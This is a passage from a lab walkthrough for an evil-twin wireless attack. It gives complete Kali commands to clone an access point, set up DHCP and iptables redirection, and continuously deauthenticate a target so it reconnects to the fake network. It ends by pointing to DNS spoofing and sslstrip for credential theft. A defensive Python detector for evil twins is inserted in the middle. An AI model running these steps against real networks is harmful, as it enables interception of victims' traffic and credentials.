2. Backtrack OS or Kali Linux: These Linux distributions ship with a large collection of penetration-testing tools.

3. A wireless network: Make sure the user has access to and control of one wireless access point. This exercise must not be practised on someone else’s access point.

4. A target machine: This can be your local machine or a VM image. A Windows 7 VM image can be used for this lab.

Step 1: Launch VMware Workstation and load the Kali Linux VM image. Click the “Edit virtual machine settings” link, go to the “Network Adapter” section and select the “Bridged” option under the “Network connection” box.

Step 2: Launch Kali Linux and log in as the root user. The default username and password are root and toor, respectively.

Step 3: Connect the wireless adapter to the laptop. The user should see the wireless adapter under the Removable Devices option with a blue tick mark. If the tick mark is not present, select the wireless adapter and choose Connect. This disconnects the wireless adapter from the Windows OS and attaches it to Kali. This is shown in the screenshot below.

Step 4: Launch a new terminal and enter the following command to check the IP address of the gateway:

route -n

In our case, the gateway is 192.168.0.1.

Step 5: To get the list of wireless interfaces, type the following command, as shown in the following screenshot:

airmon-ng

We have one interface, named wlan5. The name may differ from machine to machine.

Step 6: Check which access points are available near the user. Run the following command, as shown in the following screenshots:

airodump-ng wlan5

This starts capturing traffic and lists the available access points near the user along with the BSSID (MAC address of the access point) and the channel of each access point. Take note of the values in the PWR column; the nearest router has the smallest value.

Step 7: Note down the BSSID and channel number of the access point the user is interested in. Also note down the MAC address of the target device. In our case, the BSSID is 5E:F9:6A:29:28:18, the channel is 2 and the target machine’s MAC address is 68:5D:43:7D:F7:E9.

Step 8: We have to set up a DHCP server to provide internet access to the fake access point. Use the following command to install a DHCP server in Kali:

apt-get install isc-dhcp-server

After installation, open the dhcpd.conf file with the following command and replace its content with the configuration given below:

leafpad /etc/dhcpd.conf

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
    option routers 192.168.1.1;
    option subnet-mask 255.255.255.0;
    option domain-name "Epson_Printer";
    option domain-name-servers 192.168.1.1;
    range 192.168.1.2 192.168.1.40;
}

Save and close the file. Repeat the above step for the /etc/dhcpd/dhcpd.conf file as well.

Step 9: Open a new terminal and use the following command to create a new access point whose ESSID matches the victim access point, i.e. “Epson_Printer”:

airbase-ng -e Epson_Printer -c 2 wlan5

-e is the ESSID (network name) of the access point. -c is the channel for the wireless network. wlan5 is the interface name.

The new access point with name “Epson_Printer” is created now.

Step 10: Now open a new terminal and monitor the traffic on the newly created access point with the following command:

airodump-ng --bssid 00:C0:CA:70:8F:25 -c 2 wlan5

Step 11: Check the airodump-ng window from step 6. The newly created access point should be visible there now.
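As an added defender-side example (not part of the original walkthrough), the following Python script parses the CSV that airodump-ng writes with -w and flags an ESSID that is advertised by a second BSSID missing from an allow-list, which is exactly how the clone from step 9 appears in the step 6 scan. The CSV sample is constructed; known_bssids is assumed to be the list of the organisation’s own access points.

```python
import csv
from collections import defaultdict
from io import StringIO

# Constructed sample in the CSV layout airodump-ng writes with `-w <prefix>`;
# BSSIDs, ESSID and channel are the ones from the walkthrough, the timestamps,
# power and privacy values are made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
5E:F9:6A:29:28:18, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  2, 54, WPA2, CCMP, PSK, -61, 120, 0,   0.  0.  0.  0, 13, Epson_Printer, 
00:C0:CA:70:8F:25, 2024-01-01 10:03:00, 2024-01-01 10:05:00,  2, 54, OPN ,     ,    , -35,  40, 0,   0.  0.  0.  0, 13, Epson_Printer, 
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, WPA2, CCMP, PSK, -70, 100, 0,   0.  0.  0.  0,  9, HomeWiFi5, 
"""

def parse_access_points(text):
    """Return the access-point rows (everything before the 'Station MAC' section)."""
    aps = []
    for row in csv.reader(StringIO(text), skipinitialspace=True):
        if row and row[0].startswith("Station MAC"):
            break                                  # client section follows
        if not row or row[0] == "BSSID" or len(row) < 14:
            continue                               # blank, header or malformed
        aps.append({"bssid": row[0].strip(), "channel": int(row[3]),
                    "privacy": row[5].strip(), "power": int(row[8]),
                    "essid": row[13].strip()})
    return aps

def find_evil_twins(aps, known_bssids=()):
    """Report ESSIDs advertised by more than one BSSID. Managed networks run
    several BSSIDs per ESSID legitimately, so the telling signs are a BSSID
    missing from the allow-list and mixed encryption (the clone shows as OPN)."""
    by_essid = defaultdict(list)
    for ap in aps:
        if ap["essid"]:                            # skip hidden networks
            by_essid[ap["essid"]].append(ap)
    findings = []
    for essid, group in by_essid.items():
        if len({ap["bssid"] for ap in group}) < 2:
            continue
        findings.append({
            "essid": essid,
            "bssids": sorted(ap["bssid"] for ap in group),
            "unknown": sorted(ap["bssid"] for ap in group
                              if ap["bssid"] not in known_bssids),
            "mixed_privacy": len({ap["privacy"] for ap in group}) > 1,
            "strongest": max(group, key=lambda ap: ap["power"])["bssid"],
        })
    return findings
```

Run it periodically against a fresh airodump-ng capture; a finding with a non-empty "unknown" list and mixed_privacy set is worth investigating immediately.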

Step 12: Now we have to provide internet access to the fake access point. Open a new terminal and execute the following commands one after another.

ifconfig at0 192.168.1.1 netmask 255.255.255.0

ifconfig at0 mtu 1400

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1

(192.168.0.1 is the gateway address found in step 4.)

iptables -P FORWARD ACCEPT

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start

Step 13: Either we can wait for someone to connect to this fake access point, or we can forcefully de-authenticate our connected target so that it tries to reconnect to the access point. The following command sends the de-authentication packets:

aireplay-ng --deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5

-a 5E:F9:6A:29:28:18 is the MAC address of the access point. --deauth 0 sends de-authentication frames continuously. -c 68:5D:43:7D:F7:E9 is the MAC address of the target machine. wlan5 is the interface name.

The following screenshot shows the wireless adapter sending de-authentication packets to the given access point. The target machine is disconnected from the “Epson_Printer” access point and tries to reconnect, as shown in the following screenshot.

Step 14: Because of the continuous deauth packets, the client cannot reconnect to the original access point and automatically tries the fake access point, which has the stronger signal. This connection can be seen in the airbase-ng terminal opened in step 9.

Step 15: Check the airodump-ng command window running in the background. The device’s connection can also be seen in the terminal opened in step 10.

The victim device is now connected to the fake access point. From here an attacker can perform various attacks, such as DNS spoofing to redirect the connected victim to a fake website and grab credentials, or using sslstrip and ettercap to perform a MITM (Man in the Middle) attack.